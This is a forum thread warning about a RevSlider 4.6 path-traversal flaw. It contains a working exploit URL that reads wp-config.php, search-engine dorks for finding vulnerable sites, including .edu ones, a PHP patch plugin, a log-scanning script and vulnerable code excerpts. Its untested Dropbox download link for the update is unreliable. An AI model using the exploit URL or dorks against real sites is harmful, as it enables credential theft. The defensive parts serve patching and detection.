old66

RevSlider 4.6 - SECURITY VULNERABILITY


Anyone who has a WordPress site with RevSlider 4.6 installed should read this.

The original text is here:

There is a major security issue that is easy to exploit that requires an update to the plugin. Essentially all anyone has to do is enter the following url on a vulnerable website:

http://DOMAIN-HERE/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

That will download the wp-config.php file which includes your database credentials. I checked it on some of my sites and found several vulnerable. It is urgent that you update the plugin.

Steps to patch:

1. Download the latest version, here is a link straight from the developer

https://www.dropbox.com/s/2m9taf90gheka5d/codecanyon-2751380-slider-revolution-responsive-wordpress-plugin.zip?dl=0

2. Log into the WordPress website that has the plugin installed

3. Click on the settings for the plugin and scroll to the very bottom

4. There will be a button on the right to update the plugin

5. Self explanatory from there

Do not delete the plugin and reupload because all your sliders will be lost.

After you download the latest from the link above, you have to unzip the file and in there you will see the plugin and all the documentation.

P.S. I have not personally tested the patch .... yet.

Source: [GET] RevSlider 4.6 - URGENT SECURITY VULNERABILITY - Must read

Edited by old66
  • Upvote 2
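
To check whether a site has already received the request described in the post above, the web server access log can be searched for it. The following is an added example, not part of the original posts: the function names `classify` and `scan`, the combined log format and the sample log entries are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Same image whitelist idea as the patch plugin posted in this thread.
IMAGE_EXT = {"jpg", "jpeg", "gif", "png"}
# Request line and status code of a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def classify(line):
    """Return (client_ip, img, status) for a suspicious revslider_show_image
    request, or None for anything else."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if "revslider_show_image" not in qs.get("action", []):
        return None
    # parse_qs already URL-decodes once; decode again so that
    # double-encoded probes are normalised and flagged as well.
    img = unquote(qs.get("img", [""])[0])
    ext = img.rsplit(".", 1)[-1].lower() if "." in img else ""
    traversal = ".." in img.replace("\\", "/").split("/")
    if traversal or "\x00" in img or ext not in IMAGE_EXT:
        return (line.split(" ", 1)[0], img, int(m.group(2)))
    return None

def scan(lines):
    """Collect every suspicious hit; a 200 status means the file was likely served."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample entries (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2015:10:00:01 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3012 "-" "-"',
    '203.0.113.7 - - [01/Jan/2015:10:00:05 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=revslider_show_image&img=%2e%2e%2fwp-config.php HTTP/1.1" 403 162 "-" "-"',
    '198.51.100.4 - - [01/Jan/2015:10:02:11 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=revslider_show_image&img=uploads/2014/09/slide1.jpg HTTP/1.1" 200 48211 "-" "-"',
    '198.51.100.4 - - [01/Jan/2015:10:02:30 +0000] "POST /wp-admin/admin-ajax.php'
    '?action=heartbeat HTTP/1.1" 200 58 "-" "-"',
]

if __name__ == "__main__":
    for ip, img, status in scan(SAMPLE_LOG):
        print(f"{ip} requested img={img!r} -> HTTP {status}")
```

A hit answered with status 200 is a reason to rotate the database credentials stored in wp-config.php, in addition to updating the plugin.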

  • Moderators

Useful double post.

If you have the same problem as me, where Revolution Slider is built into the template and you can't modify it without modifying the whole template, take from here a plugin with the patch for the vulnerability.

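<?php
/*
Plugin Name: Patch for Revolution Slider
Author: Dragos
Description: Fixes the download vulnerability in Revolution Slider.
Version: 1.0
*/

// Only filter the vulnerable action, so other admin-ajax.php requests are not blocked.
if (stristr($_SERVER["SCRIPT_FILENAME"], "/wp-admin/admin-ajax.php")
    && isset($_REQUEST['action']) && $_REQUEST['action'] === 'revslider_show_image')
{
    $img = (isset($_GET['img']) && is_string($_GET['img'])) ? $_GET['img'] : '';
    // Allowed: letters, digits, space, dash, underscore, dot, slash.
    // The dash is escaped; unescaped, " -_" is read as a character range.
    $file = preg_replace('/[^\da-zA-Z \-_.\/]/', '', $img);
    $q = explode(".", $file);
    $acceptate = array("jpg", "jpeg", "gif", "png");
    // Deny path traversal, non-image extensions and files that do not exist.
    if (strpos($file, "..") !== false
        || !in_array(strtolower($q[count($q) - 1]), $acceptate)
        || !file_exists($file))
    {
        die("Access denied.");
    }
}

?>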

Edited by Dragos

  • Moderators

This is the good dork, with 442000 results. Shit

inurl:revslider/views/templates/dialog_preview_slide.php

Edit: we have .edu sites too

allinurl:revslider/views/templates/dialog_preview_slide.php edu

EDIT: For the young lads who set out to become hackers overnight: there is nothing you can do with the wp-config if you don't have direct access to phpMyAdmin or to the database administration panel.

Edited by Dragos

The problem seems to be old (that is, they commented out the lines and have now brought them back live, so it should work on older versions too).

https://github.com/anattadesign/gunter/blob/master/wp-content/plugins/revslider/inc_php/image_view.class.php

$revSliderVersion = "2.2.4";

https://github.com/anattadesign/gunter/blob/master/wp-content/plugins/revslider/revslider.php

These functions are just as dubious, but I didn't take the time to look for where they are called from. Whoever has the time will most likely find more serious problems in the plugin.

//------------------------------------------------------------------------------------------
// download image, change size and name if needed.
public function downloadImage($filename){
    $filepath = $this->urlImages."/".$filename;
    if(!is_file($filepath)) {
        echo "file doesn't exists";
        exit();
    }

    $this->outputImageForDownload($filepath,$filename);
}

//------------------------------------------------------------------------------------------
// output image for downloading
private function outputImageForDownload($filepath,$filename,$mimeType=""){
    $contents = file_get_contents($filepath);
    $filesize = strlen($contents);

    if($mimeType == ""){
        $info = UniteFunctionsRev::getPathInfo($filepath);
        $ext = $info["extension"];
        $mimeType = "image/$ext";
    }

    header("Content-Type: $mimeType");
    header("Content-Disposition: attachment; filename=\"$filename\"");
    header("Content-Length: $filesize");
    echo $contents;
    exit();
}

PS: I may be wrong, I didn't spend much time checking.
